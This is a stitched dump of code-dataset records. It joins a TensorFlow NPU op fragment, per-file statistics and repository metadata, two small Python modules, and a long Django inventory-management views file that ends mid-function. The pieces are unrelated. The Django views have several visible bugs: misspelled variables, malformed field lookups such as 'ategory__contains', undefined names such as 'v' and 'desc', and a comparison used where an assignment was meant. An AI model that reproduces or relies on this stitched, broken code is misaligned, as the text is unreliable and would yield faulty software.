mul3_x, add2_y, steps, do_use_weight, weight_decay_rate, name)
return update, nextv, nextm
def lamb_apply_weight_assign(input0, input1, input2, input3, input4, name=None):
if context.executing_eagerly():
raise RuntimeError("tf.lamb_apply_weight_assign() is not compatible with "
"eager execution.")
result = gen_npu_ops.lamb_apply_weight_assign(input0, input1, input2, input3, input4, name)
return result | 51.395833 | 122 | 0.703283 | 344 | 2,467 | 4.906977 | 0.360465 | 0.07109 | 0.030806 | 0.037915 | 0.830569 | 0.819905 | 0.819905 | 0.773697 | 0.773697 | 0.773697 | 0 | 0.024072 | 0.191731 | 2,467 | 48 | 123 | 51.395833 | 0.822467 | 0.518849 | 0 | 0.222222 | 0 | 0 | 0.121972 | 0.052768 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.166667 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
632bbf1277465e6aebef60172d464cc29fee75df | 168 | py | Python | apps/employees/models/__init__.py | wis-software/office-manager | 0342d2cf9b3e4779f3e3d2a4faba6768e95047b1 | [
"MIT"
] | 7 | 2017-09-28T11:20:43.000Z | 2020-01-18T23:23:52.000Z | apps/employees/models/__init__.py | wis-software/office-manager | 0342d2cf9b3e4779f3e3d2a4faba6768e95047b1 | [
"MIT"
] | 1 | 2019-03-12T18:16:12.000Z | 2019-03-12T20:17:40.000Z | apps/employees/models/__init__.py | wis-software/office-manager | 0342d2cf9b3e4779f3e3d2a4faba6768e95047b1 | [
"MIT"
] | 7 | 2017-09-27T11:12:25.000Z | 2019-04-04T13:24:01.000Z | from apps.employees.models.position import Position
from apps.employees.models.specialization import Specialization
from apps.employees.models.employee import Employee
| 42 | 63 | 0.875 | 21 | 168 | 7 | 0.380952 | 0.163265 | 0.346939 | 0.469388 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 168 | 3 | 64 | 56 | 0.942308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
2d67917c15b6f46511efe26639a5a027e88251ea | 161 | py | Python | video_production/annotations/team.py | OddballSports-tv/obies-eyes | 2dd4fc9686f852b9adf89edd3246ad642063ac8b | [
"Apache-2.0"
] | null | null | null | video_production/annotations/team.py | OddballSports-tv/obies-eyes | 2dd4fc9686f852b9adf89edd3246ad642063ac8b | [
"Apache-2.0"
] | 1 | 2022-02-19T20:40:44.000Z | 2022-02-19T20:40:44.000Z | video_production/annotations/team.py | OddballSports-tv/obies-eyes | 2dd4fc9686f852b9adf89edd3246ad642063ac8b | [
"Apache-2.0"
] | null | null | null | # imports
from .annotation import Annotation
import cv2
class Team(Annotation):
def _annotate(self, frame, team=None, *args, **kwargs):
return frame | 23 | 59 | 0.714286 | 20 | 161 | 5.7 | 0.75 | 0.280702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007634 | 0.186335 | 161 | 7 | 60 | 23 | 0.862595 | 0.043478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.4 | 0.2 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
2d936a5001d4613edc5fe87e1c5821e5e3d5e5f5 | 44,937 | py | Python | inventory/views.py | Kgford/TCLI | fe35abdf6771bcecc6c255b22faa513011ab9b9b | [
"BSD-3-Clause"
] | null | null | null | inventory/views.py | Kgford/TCLI | fe35abdf6771bcecc6c255b22faa513011ab9b9b | [
"BSD-3-Clause"
] | 1 | 2020-08-02T17:13:59.000Z | 2020-08-02T17:13:59.000Z | inventory/views.py | Kgford/TCLI | fe35abdf6771bcecc6c255b22faa513011ab9b9b | [
"BSD-3-Clause"
] | null | null | null | from django import forms
import json
from django.shortcuts import render
from django.http import HttpResponseRedirect
from django.http import JsonResponse
from django.core import serializers
from .forms import InventoryForm
from datetime import date
from django.urls import reverse, reverse_lazy
from equipment.models import Model
from locations.models import Location
from inventory.models import Inventory, Events
from django.views import View
import datetime
from django.contrib.auth.decorators import login_required
# Create your views here.
class InventoryView(View):
'''
#~~~~~~~~~~~Load Item database from csv. must put this somewhere else later"
import csv
timestamp = date.today()
import csv
timestamp = date.today()
CSV_PATH = 'items.csv'
print('csv = ',CSV_PATH)
contSuccess = 0
# Remove all data from Table
#Inventory.objects.all().delete()
f = open(CSV_PATH)
reader = csv.reader(f)
print('reader = ',reader)
for category, shelf, modelname, serial_number, description, locationname, status, remarks,last_update,update_by in reader:
Inventory.objects.create(category=category, shelf=shelf, modelname=modelname, serial_number=serial_number, description=description, locationname=locationname,
status=status, remarks=remarks, last_update=datetime.datetime.strptime(last_update, '%m/%d/%Y'), update_by=update_by)
contSuccess += 1
print(f'{str(contSuccess)} inserted successfully! ')
'''
'''
#~~~~~~~~~~~Load Events database from csv. must put this somewhere else later"
import csv
timestamp = date.today()
CSV_PATH = 'events.csv'
print('csv = ',CSV_PATH)
contSuccess = 0
# Remove all data from Table
Events.objects.all().delete()
f = open(CSV_PATH)
reader = csv.reader(f)
print('reader = ',reader)
for event_type, event_date, operator, comment, inventory_id, locationname, rma, rtv, mr, in reader:
print('event date=',event_date)
Events.objects.create(event_type=event_type, event_date=datetime.datetime.strptime(event_date, '%m/%d/%Y'), operator=operator,comment=comment, locationname=locationname, mr=mr, rtv =rtv, rma =rma, inventory_id=inventory_id)
contSuccess += 1
print(f'{str(contSuccess)} inserted successfully! ')
#~~~~~~~~~~~Load Events database from csv. must put this somewhere else later"
'''
'''
import csv
timestamp = date.today()
CSV_PATH = 'locations.csv'
print('csv = ',CSV_PATH)
contSuccess = 0
# Remove all data from Table
Location.objects.all().delete()
f = open(CSV_PATH)
reader = csv.reader(f)
print('reader = ',reader)
for name, address, city, state,zip_code, phone, email, website, lat, lng, created_on ,last_entry in reader:
if lat=="": lat=40.815320
if lng=="": lng=-73.237710
Location.objects.create(name=name, address=address, city=city, state=state, zip_code=zip_code, phone=phone, email=email,
website=website,active=True, lat=float(lat), lng=float(lng), created_on=timestamp, last_entry=timestamp)
contSuccess += 1
print(f'{str(contSuccess)} inserted successfully! ')
'''
#load_iventory_csv(True)
#load_events_csv(True)
form_class = InventoryForm
template_name = "index.html"
success_url = reverse_lazy('inventory:inv')
def get(self, *args, **kwargs):
form = self.form_class()
try:
description=-1
category=-1
model=-1
status=-1
locationname=-1
shelf=-1
search=-1
print("in GET")
desc_list = Inventory.objects.order_by('description').values_list('description', flat=True).distinct()
models_list = Inventory.objects.order_by('modelname').values_list('modelname', flat=True).distinct()
categorys_list = Inventory.objects.order_by('category').values_list('category', flat=True).distinct()
status_list = Inventory.objects.order_by('status').values_list('status', flat=True).distinct()
locations_list = Inventory.objects.order_by('locationname').values_list('locationname', flat=True).distinct()
shelves_list = Inventory.objects.order_by('shelf').values_list('shelf', flat=True).distinct()
inv = Inventory.objects.all()
except IOError as e:
print ("Lists load Failure ", e)
print('error = ',e)
return render (self.request,"inventory/index.html",{"form": form, "inventory": inv, "desc_list":desc_list, "status_list":status_list,
"models_list":models_list, "locations_list":locations_list, "shelves_list":shelves_list,"categorys_list":categorys_list, "index_type":"INVENTORY",
'description':description,'model':model,'status':status, 'category':category, 'locationname':locationname, 'shelf':shelf,'search':search})
def post(self, request, *args, **kwargs):
try:
#print("in POST")
json_data = []
inv_list = []
inv = []
form = self.form_class()
#print('request =',request)
model = request.POST.get('_model', -1)
#print('model = ',model)
description = request.POST.get('_desc', -1)
#print('description = ',description)
status = request.POST.get('_status', -1)
#print('status =',status)
category = request.POST.get('_category', -1)
#print('category =',category)
locationname = request.POST.get('_site', -1)
#print('locationname =',locationname)
shelf = request.POST.get('_shelf', -1)
#print('shelf =',shelf)
select = request.POST.get('sel', -1)
#print('select =',select)
search = request.POST.get('search', -1)
#print('search =',search)
print_report = request.POST.get('monthly_report', -1)
#print('print_report =',print_report)
success = True
desc_list = Inventory.objects.order_by('description').values_list('description', flat=True).distinct()
models_list = Inventory.objects.order_by('modelname').values_list('modelname', flat=True).distinct()
categorys_list = Inventory.objects.order_by('category').values_list('category', flat=True).distinct()
status_list = Inventory.objects.order_by('status').values_list('status', flat=True).distinct()
locations_list = Inventory.objects.order_by('locationname').values_list('locationname', flat=True).distinct()
shelves_list = Inventory.objects.order_by('shelf').values_list('shelf', flat=True).distinct()
if not search ==-1:
inv_list = Inventory.objects.filter(description__icontains=search) | Inventory.objects.filter(modelname__icontains=search) | Inventory.objects.filter(status__icontains=search) | Inventory.objects.filter(category__icontains=search) | Inventory.objects.filter(locationname__icontains=search) | Inventory.objects.filter(serial_number__contains=search) | Inventory.objects.filter(shelf__icontains=search).all()
elif description == "select menu" and model == "select menu" and status == "select menu" and category == "select menu" and locationname == "select menu" and shelf == "select":
inv_list = Inventory.objects.all()
elif not category =="select menu":
if description == "select menu" and model == "select menu" and status == "select menu" and locationname == "select menu" and shelf == "select":#category only
inv_list = Inventory.objects.filter(category=category).all()
if not model == "select menu" and status == "select menu" and locationname == "select menu" and shelf == "select": #category & model
inv_list = Inventory.objects.filter(category=category, modelname__contains=model).all()
if not model == "select menu" and not status == "select menu" and locationname == "select menu" and shelf == "select": #category & status & model & description
inv_list = Inventory.objects.filter(category=category, modelname__contains=model, status__contains=status).all()
if not model == "select menu" and not status == "select menu" and not locationname == "select menu" and shelf == "select": #category & status & model & description
inv_list = Inventory.objects.filter(category=category, modelname__contains=model, status__contains=status, locationname__contains=locationname).all()
if not model == "select menu" and not status == "select menu" and not locationname == "select menu" and not shelf == "select": #category & status & model & description & cat
iinv_list = Inventory.objects.filter(category=category, modelname__contains=model, status__contains=status, locationname__contains=locationname, shelf__contains=shelf).all()
if not model == "select menu" and not status == "select menu" and not locationname == "select menu" and not shelf == "select" and not description == "select menu" : #category & status & model & description & cat
iinv_list = Inventory.objects.filter(category=category, modelname__contains=model, status__contains=status, locationname__contains=locationname, shelf__contains=shelf, description__icontains=description).all()
elif not model =="select menu":
if description == "select menu" and status == "select menu" and category == "select menu" and locationname == "select menu" and shelf == "select":#model only
inv_list = Inventory.objects.filter(modelname__contains=model).all()
if not category == "select menu" and status == "select menu" and description == "select menu" and locationname == "select menu" and shelf == "select": #model & description
inv_list = Inventory.objects.filter(modelname__icontains=model, category_icontains=category ).all()
if not category == "select menu" and not status == "select menu" and description == "select menu" and locationname == "select menu" and shelf == "select": #model & description & status
inv_list = Inventory.objects.filter(modelname__icontains=model,category=category, status__contains=status).all()
if not category == "select menu" and not status == "select menu" and not description == "select menu" and locationname == "select menu" and shelf == "select": #model & status
inv_list = Inventory.objects.filter(modelname__icontains=model,category=category, status__contains=status, description__icontains=description).all()
if not category == "select menu" and not status == "select menu" and not description == "select menu" and not locationname == "select menu" and shelf == "select": #model & description & status & cat
inv_list = Inventory.objects.filter(modelname__icontains=model,category=category, status__contains=status,description__icontains=description,locationname__icontains=locationname).all()
if not category == "select menu" and not status == "select menu" and not description == "select menu" and not locationname == "select menu" and shelf == "select": #model & description & status & cat' loc
inv_list = Inventory.objects.filter(dmodelname__icontains=model,category=category, status__contains=status, description__icontains=description,locationname__icontains=locationname).all()
if not category == "select menu" and not status == "select menu" and not description == "select menu" and not locationname == "select menu" and not shelf == "select": #model & description & status & cat' loc & shelf
inv_list = Inventory.objects.filter(modelname__icontains=model,category_icontains=category, status__contains=status, description__icontains=description, locationname__icontains=locationname, shelf__contains=shelf).all()
elif not status =="select menu":
if description == "select menu" and model == "select menu" and category == "select menu" and locationname == "select menu" and shelf == "select":#status only
inv_list = Inventory.objects.filter(status__contains=status).all()
if not model == "select menu" and not status == "select menu" and category == "select menu" and locationname == "select menu" and shelf == "select": #status & model
inv_list = Inventory.objects.filter(status__contains=status, modelname__contains=model).all()
if not model == "select menu" and not status == "select menu" and not category == "select menu" and locationname == "select menu" and shelf == "select": #status & description
inv_list = Inventory.objects.filter(status__contains=status, modelname__contains=model,category=category).all()
if not model == "select menu" and not status == "select menu" and not category == "select menu" and not locationname == "select menu" and shelf == "select": #status & model & description
inv_list = Inventory.objects.filter(status__contains=status, modelname__contains=model,category=category, locationname__icontains=locationname).all()
if not model == "select menu" and not status == "select menu" and not category == "select menu" and not locationname == "select menu" and shelf == "select": #status & model & description & cat
inv_list = Inventory.objects.filter(status__contains=status, modelname__contains=model,category=category, locationname__icontains=locationname).all()
if not model == "select menu" and not status == "select menu" and not category == "select menu" and not locationname == "select menu" and not shelf == "select": #status & model & description & cat' loc
inv_list = Inventory.objects.filter(status__contains=status, modelname__contains=model,category=category, locationname__icontains=locationname, shelf__contains=shelf).all()
if not model == "select menu" and not status == "select menu" and not category == "select menu" and not locationname == "select menu" and not shelf == "select" and not description == "select menu" : #status & model & description & cat' loc & shelf
inv_list = Inventory.objects.filter(status__contains=status, modelname__contains=model,category=category, locationname__icontains=locationname, shelf__contains=shelf, description__icontains=description).all()
elif not locationname =="select menu":
if description == "select menu" and model == "select menu" and status == "select menu" and category == "select menu" and shelf == "select":#locationname only
inv_list = Inventory.objects.filter(locationname__contains= locationname).all()
if not shelf == "select menu" and status == "select menu" and category == "select menu" and category == "select menu" and model == "select": #locationname & model
inv_list = Inventory.objects.filter(locationname__contains=locationname, shelf__contains=shelf).all()
if not shelf == "select menu" and not status == "select menu" and category == "select menu" and category == "select menu" and shelf == "select": #locationname & status & model & description
inv_list = Inventory.objects.filter(locationname__contains=locationname, shelf__contains=shelf,status__contains=status).all()
if not shelf == "select menu" and not status == "select menu" and not category == "select menu" and category == "select menu" and shelf == "select": #locationname & status & model & description & cat
inv_list = Inventory.objects.filter(locationname__contains=locationname,shelf__contains=shelf, status__contains=status, category__contains=category).all()
if not shelf == "select menu" and not status == "select menu" and not locationname == "select menu" and not category == "select menu" and shelf == "select": #locationname & status & model & description & cat
inv_list = Inventory.objects.filter(locationname__contains=locationname, shelf__contains=shelf, description__contains=description, status__contains=status, category=category).all()
if not shelf == "select menu" and not status == "select menu" and not category == "select menu" and not category == "select menu" and not shelf == "select" and not modelname == "select": #locationname & status & model & description & cat & shelf
inv_list = Inventory.objects.filter(locationname__contains=locationname, shelf__contains=shelf, description__contains=description, status__contains=status, category=category, modelname__contains=model).all()
elif not shelf =="select":
if description == "select menu" and model == "select menu" and status == "select menu" and category == "select menu" and locationname == "select menu":#locationname only
inv_list = Inventory.objects.filter(shelf__contains=shelf).all()
if not locationname == "select menu" and status == "select menu" and category == "select menu" and category == "select menu" and model == "select menu": #locationname & model
inv_list = Inventory.objects.filter(shelf__contains=shelf, locationname__contains=locationname).all()
if not locationname == "select menu" and not status == "select menu" and category == "select menu" and category == "select menu" and model == "select menu": #locationname & status & model & description
inv_list = Inventory.objects.filter(shelf__contains=shelf, locationname__contains=locationname, status__contains=status).all()
if not locationname == "select menu" and not status == "select menu" and not category == "select menu" and category == "select menu" and model == "select menu": #locationname & status & model & description & cat
inv_list = Inventory.objects.filter(shelf__contains=shelf, locationname__contains=locationname, category__contains=category, status__contains=status).all()
if not locationname == "select menu" and not status == "select menu" and not category == "select menu" and not category == "select menu" and locationname == "select menu": #locationname & status & model & description & cat
inv_list = Inventory.objects.filter(shelf__contains=shelf, locationname__contains=v, status__contains=status, category__contains=category).all()
if not locationname == "select menu" and not status == "select menu" and not category == "select menu" and not category == "select menu" and not model == "select menu": #locationname & status & model & description & cat & shelf
inv_list = Inventory.objects.filter(shelf__contains=shelf, locationname__contains=locationname, description__contains=desc, status__contains=status, category__contains=category, modelname__contains=model).all()
elif not description =="select menu":
if model == "select menu" and status == "select menu" and category == "select menu" and locationname == "select menu" and shelf == "select": #All
inv_list = Inventory.objects.filter(description__contains=description).all()
if not model == "select menu" and status == "select menu" and category == "select menu" and locationname == "select menu" and shelf == "select": #description, model
inv_list = Inventory.objects.filter(description__contains=description, modelname__contains=model).all()
if model == "select menu" and not status == "select menu" and category == "select menu" and locationname == "select menu" and shelf == "select": #description&status
inv_list = Inventory.objects.filter(description__contains=description, modelname__contains=model, status__contains=status).all()
if not model == "select menu" and not status == "select menu" and not category == "select menu" and locationname == "select menu" and shelf == "select": #description & model, status, cat
inv_list = Inventory.objects.filter(description__contains=description, modelname__contains=model, status__contains=status,ategory__contains=category).all()
if not model == "select menu" and not status == "select menu" and not category == "select menu" and not locationname == "select menu" and shelf == "select": #description, model, status, cat' loc
inv_list = Inventory.objects.filter(description__contains=description, modelname__contains=model, status__contains=status, category=category, locationname__contains=locationname).all()
if not model == "select menu" and not status == "select menu" and not category == "select menu" and not locationname == "select menu" and not shelf == "select": #description & model & status & cat' loc & shelf
inv_list = Inventory.objects.filter(description__contains=description, modelname__contains=model, status__contains=status, category=category, locationname__contains=locationname, shelf__contains=shelf).all()
else:
inv_list ==None
except IOError as e:
inv_list = None
print ("Lists load Failure ", e)
#print('inv_list',inv_list)
return render (self.request,"inventory/index.html",{"form": form, "inventory": inv_list, "desc_list":desc_list, "status_list":status_list,
"models_list":models_list, "locations_list":locations_list, "shelves_list":shelves_list,"categorys_list":categorys_list, "index_type":"INVENTORY",
'description':description,'model':model,'status':status, 'category':category, 'locationname':locationname, 'shelf':shelf,'search':search})
# Create your views here.
class SearchView(View):
template_name = "search.html"
print('in search view')
def get(self, *args, **kwargs):
form = self.form_class()
#print('we are here')
try:
desc_list = Model.objects.order_by('description').values_list('description', flat=True).distinct()
models_list = Inventory.objects.order_by('modelname').values_list('modelname', flat=True).distinct()
categorys_list = Inventory.objects.order_by('category').values_list('category', flat=True).distinct()
status_list = Inventory.objects.order_by('status').values_list('status', flat=True).distinct()
locations_list = Inventory.objects.order_by('locationname').values_list('locationname', flat=True).distinct()
shelves_list = Inventory.objects.order_by('shelf').values_list('shelf', flat=True).distinct()
inv = Inventory.objects.all()
except IOError as e:
print ("Lists load Failure ", e)
print('error = ',e)
return render (self.request,"inventory/index.html",{"form": form, "inventory": inv, "desc_list":desc_list, "status_list":status_list,
"models_list":models_list, "locations_list":locations_list, "shelves_list":shelves_list,"categorys_list":categorys_list, "index_type":"INVENTORY"})
def post(self, *args, **kwargs):
form = self.form_class()
#print(form)
#print('we are here')
def load_iventory_csv(delete):
#~~~~~~~~~~~Load Item database from csv. must put this somewhere else later"
import csv
timestamp = date.today()
CSV_PATH = 'items.csv'
#print('csv = ',CSV_PATH)
contSuccess = 0
# Remove all data from Table
if delete:
Inventory.objects.all().delete()
f = open(CSV_PATH)
reader = csv.reader(f)
print('reader = ',reader)
for category, shelf, modelname, serial_number, description, locationname, status, remarks, site_quantity, field_quantity, repair_quantity,last_update, update_by in reader:
Inventory.objects.create(shelf=shelf,serial_number=serial_number, modelname=modelname, description=description, locationname=locationname,
category=category,status=status, site_quantity=site_quantity, field_quantity=field_quantity,repair_quantity=repair_quantity, remarks=remarks, last_update=datetime.datetime.strptime(last_update, '%m/%d/%Y'), update_by=update_by)
contSuccess += 1
print(f'{str(contSuccess)} inserted successfully! ')
def load_events_csv(delete):
#~~~~~~~~~~~Load Item database from csv. must put this somewhere else later"
import csv
timestamp = date.today()
#~~~~~~~~~~~Load Events database from csv. must put this somewhere else later"
CSV_PATH = 'events.csv'
#print('csv = ',CSV_PATH)
contSuccess = 0
# Remove all data from Table
if delete:
Events.objects.all().delete()
f = open(CSV_PATH)
reader = csv.reader(f)
print('reader = ',reader)
for event_type, event_date, operator, comment,locationname, inventory_id, rma, rtv, mr, in reader:
Events.objects.create(event_type=event_type, event_date=datetime.datetime.strptime(event_date, '%m/%d/%Y'), operator=operator,comment=comment, locationname=locationname, mr=mr, rtv =rtv, rma =rma, inventory_id=inventory_id)
contSuccess += 1
print(f'{str(contSuccess)} inserted successfully! ')
#~~~~~~~~~~~Load Events database from csv. must put this somewhere else later"
def update_inv(request):
if request.method == 'POST':
update_inv = request.POST.get('update_inv', -1)
inventory_id = request.POST.get('i_id', -1)
del_inv = request.POST.get('del_inv', -1)
operator = request.POST.get('_operator', -1)
event = 'n/a'
#print('inventory_id =',inventory_id)
active_inv = Inventory.objects.filter(id=inventory_id)
#print(active_inv)
active_inv = active_inv[0]
#print(active_inv.description)
mname = active_inv.modelname
model = Model.objects.filter(model__contains=mname)
model = model[0]
image_file = model.image_file
if image_file == None:
image_file = 'inventory/images/inv1.jpg'
#print(image_file)
locations_list = Location.objects.order_by('name').values_list('name', flat=True).distinct()
shelves_list = Location.objects.order_by('shelf').values_list('shelf', flat=True).distinct()
categorys_list = Inventory.objects.order_by('category').values_list('category', flat=True).distinct()
event_list = Events.objects.filter(inventory_id=inventory_id).all()
models_list = Model.objects.order_by('model').values_list('model', flat=True).distinct()
#print('del_inv =',del_inv)
#print('update_inv =',update_inv)
if not del_inv==-1:
try:
#update item
Inventory.objects.filter(id=inventory_id).delete()
print('delete complete')
except IOError as e:
print ("Events Save Failure ", e)
return HttpResponseRedirect(reverse('inventory:inven'))
elif not update_inv==-1:
return render (request,"inventory/items.html",{"today":date.today(), "locations_list":locations_list, "models_list":models_list, 'active_inv':active_inv})
return render (request,"inventory/item.html",{"active_inv":active_inv, "image_file":image_file,"event_list":event_list,
"today":date.today(), "locations_list":locations_list, "shelf_list":shelves_list,'event':event,'active_operator':request.user})
def save_event(request):
if request.method == 'POST':
timestamp = date.today()
update_inv = request.POST.get('update_inv', -1)
del_inv = request.POST.get('del_inv', -1)
event_id = request.POST.get('e_id', -1)
inventory_id = request.POST.get('i_id', -1)
operator = request.POST.get('_operator', -1)
event_type = request.POST.get('_event', -1)
event_date = request.POST.get('_date', -1)
locationname = request.POST.get('_site', -1)
mr = request.POST.get('_mr', -1)
rtv = request.POST.get('_rtv', -1)
rma = request.POST.get('_rma', -1)
comment = request.POST.get('_comments', -1)
save = request.POST.get('_save', -1)
update = request.POST.get('_update', -1)
delete = request.POST.get('_delete', -1)
locations_list = Location.objects.order_by('name').values_list('name', flat=True).distinct()
shelves_list = Location.objects.order_by('shelf').values_list('shelf', flat=True).distinct()
event_list = Events.objects.filter(inventory_id=inventory_id).all()
models_list = Model.objects.order_by('model').values_list('model', flat=True).distinct()
event = 'n/a'
active_inv = Inventory.objects.filter(id=inventory_id)
active_inv = active_inv[0]
mname = active_inv.modelname
model = Model.objects.filter(model__contains=mname)
model = model[0]
image_file = model.image_file
if not del_inv==-1:
try:
#update item
Inventory.objects.filter(id=inventory_id).delete()
print('delete complete')
except IOError as e:
print ("Events Save Failure ", e)
return HttpResponseRedirect(reverse('inventory:inven'))
elif not update_inv==-1:
return render (request,"inventory/items.html",{"today":date.today(), "locations_list":locations_list, "models_list":models_list, "shelf_list":shelves_list,'active_inv':active_inv})
elif not save==-1:
try:
#save new event
if comment=="'\t\t\t\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t'" or comment=='' or comment==-1:
comment="New event",event_id," created"
Events.objects.create(event_type=event_type, event_date=event_date, operator=operator, comment=comment, locationname=locationname,mr=mr, rma=rma,rtv=rtv, inventory_id=inventory_id)
#update item
Inventory.objects.filter(id=inventory_id).update(remarks=comment,locationname=locationname,update_by=operator,last_update=timestamp)
except IOError as e:
print ("Events Save Failure ", e)
elif not update==-1:
try:
print('event date',event_date)
if comment=="'\t\t\t\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t'" or comment=='' or comment==-1:
comment="Event",event_id," updated"
print('event date',event_date)
#update existing event
Events.objects.filter(id=event_id).update(event_type=event_type,event_date=event_date,locationname=locationname,operator=operator,
comment=comment,mr=mr,rma=rma)
#update item
Inventory.objects.filter(id=inventory_id).update(remarks=comment,locationname=locationname,update_by=operator,last_update=timestamp)
except IOError as e:
print ("Events Update Failure ", e)
elif not delete==-1:
try:
if comment=="'\t\t\t\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t'" or comment=='' or comment==-1:
comment="Event",event_id," deleted"
#delete existing event
Events.objects.filter(id=event_id).delete()
#update item
Inventory.objects.filter(id=inventory_id).update(remarks=comment,locationname=locationname,update_by=operator,last_update=timestamp)
except IOError as e:
print ("Events Update Failure ", e)
if image_file == None:
image_file = 'inventory/images/inv1.jpg'
#print(image_file)
#print('operator=',operator)
return render (request,"inventory/item.html",{"active_inv":active_inv, "image_file":image_file,"event_list":event_list,
"today":date.today(), "locations_list":locations_list, "shelf_list":shelves_list,'event':event,'active_operator':operator})
def items(request):
desc_list = []
models_list = []
locations_list = []
shelves_list = []
timestamp = date.today()
operator = request.user
#print(timestamp)
if request.method == 'POST':
inventory_id = request.POST.get('inventory_id', -1)
#print(inventory_id)
description = request.POST.get('_desc', -1)
#print('description =',description)
category = request.POST.get('_cat', -1)
#print('category=',category)
status = request.POST.get('_stat', -1)
#print(status)
model = request.POST.get('_model', -1)
#print('model=',model)
purchase_order = request.POST.get('_po', -1)
#print(purchase_order)
serial_number = request.POST.get('_sn', -1)
#print('serial_number=',serial_number)
activestr = request.POST.get('_active', -1)
if activestr =='True' or activestr=='true':
active=True
elif activestr =='False' or activestr =='false':
active=False
else:
active=True
#print(active)
location = request.POST.get('_site', -1)
#print('location =',location)
shelf = request.POST.get('_shelf', -1)
#print('shelf=',shelf)
remarks = request.POST.get('_remarks', -1)
#print(remarks)
model_id = Model.objects.filter(model__contains=model)
#print('model_id=',model_id)
model_id=model_id[0].id
#print('model_id=',model_id)
location_id = Location.objects.filter(name=location)
location_id=location_id[0].id
#print('location_id=',location_id)
shelf_id = Location.objects.filter(name=shelf)
#shelf_id=shelf_id[0].id
#print('shelf_id=',shelf_id)
save = request.POST.get('_save', -1)
#print('save',save)
update = request.POST.get('_update', -1)
#print('update',update)
operator = request.POST.get('_operator', -1)
if operator==-1:
operator = str(request.user)
#print('operator',operator)
try:
if not save ==-1:
# Add new Inventory item
Inventory.objects.create(serial_number=serial_number, modelname=model,description=description, locationname=location, shelf=shelf, category=category,
model_id=model_id, status=status,remarks=remarks, purchase_order=purchase_order, active=activestr, last_update=timestamp, update_by=operator)
Events.objects.create(event_type="ADD NEW", event_date=timestamp, operator=operator, comment="New Inventory Item", locationname=location, inventory_id=inventory_id)
elif not update==-1:
# Add new Inventory item
#print('inventory_id=',inventory_id)
Inventory.objects.filter(id=inventory_id).update(serial_number=serial_number, modelname=model,description=description, locationname=location, shelf=shelf, category=category,
model_id=model_id, status=status,remarks=remarks, purchase_order=purchase_order, active=activestr, last_update=timestamp, update_by=operator)
Events.objects.create(event_type="UPDATE ITEM", event_date=timestamp, operator=operator, comment=remarks, locationname=location, inventory_id=inventory_id)
HttpResponseRedirect(reverse('inventory:inven'))
except IOError as e:
print ("Inventory Save Failure ", e)
return HttpResponseRedirect(reverse('inventory:inven'))
try:
desc_list = Model.objects.order_by('description').values_list('description', flat=True).distinct()
models_list = Model.objects.order_by('model').values_list('model', flat=True).distinct()
locations_list = Location.objects.order_by('name').values_list('name', flat=True).distinct()
shelves_list = Location.objects.order_by('shelf').values_list('shelf', flat=True).distinct()
except IOError as e:
print ("Lists load Failure ", e)
return render (request,"inventory/items.html",{"today":date.today(), "locations_list":locations_list, "models_list":models_list, "shelf_list":shelves_list,'active_operator':operator})
def item(request):
locations_list = []
shelves_list = []
event_list = []
event = 'n/a'
uploaded_file_url = ""
#Get locationname
try:
event_id = request.GET.get('event_id', -1)
#print('event_id = ',event_id)
if not event_id==-1:
event = Events.objects.filter(id=event_id)
event=event[0]
#print(event)
inventory_id = request.GET.get('inventory_id', -1)
#print('inventory_id = ',inventory_id)
active_inv = Inventory.objects.filter(id=inventory_id)
active_inv = active_inv[0]
#print('active_inv = ',active_inv)
mname = active_inv.modelname
#print('model name =',mname)
model = Model.objects.filter(model__icontains=mname)
#print('model=',model)
if Model.objects.filter(model__icontains=mname).exists():
model = model[0]
uploaded_file_url=model.photo
#print('model=',model)
if uploaded_file_url==None or uploaded_file_url =="":
uploaded_file_url = '/tcli/media/inv1.jpg'
#print('uploaded_file_url =',uploaded_file_url)
locations_list = Location.objects.order_by('name').values_list('name', flat=True).distinct()
shelves_list = Location.objects.order_by('shelf').values_list('shelf', flat=True).distinct()
event_list = Events.objects.filter(inventory_id=inventory_id).all()
#print('event_list = ',event_list)
operator=request.user
#print('operator = ',operator)
except IOError as e:
print ("Lists load Failure ", e)
return render (request,"inventory/item.html",{"active_inv":active_inv, "uploaded_file_url":uploaded_file_url,"event_list":event_list,
"today":date.today(), "locations_list":locations_list, "shelf_list":shelves_list,'event':event,'active_operator':operator})
def report(request):
locations_list = []
shelves_list = []
event_list = []
event = 'n/a'
uploaded_file_url = ""
operator = str(request.user)
#Get locationname
try:
inventory_id = request.GET.get('inventory_id', -1)
#print('inventory_id = ',inventory_id)
active_inv = Inventory.objects.filter(id=inventory_id)
active_inv = active_inv[0]
#print('active_inv = ',active_inv)
mname = active_inv.modelname
#print('model name =',mname)
model = Model.objects.filter(model__icontains=mname)
if Model.objects.filter(model__icontains=mname).exists():
model = model[0]
uploaded_file_url=model.photo
#print('model=',model)
if uploaded_file_url==None or uploaded_file_url =="":
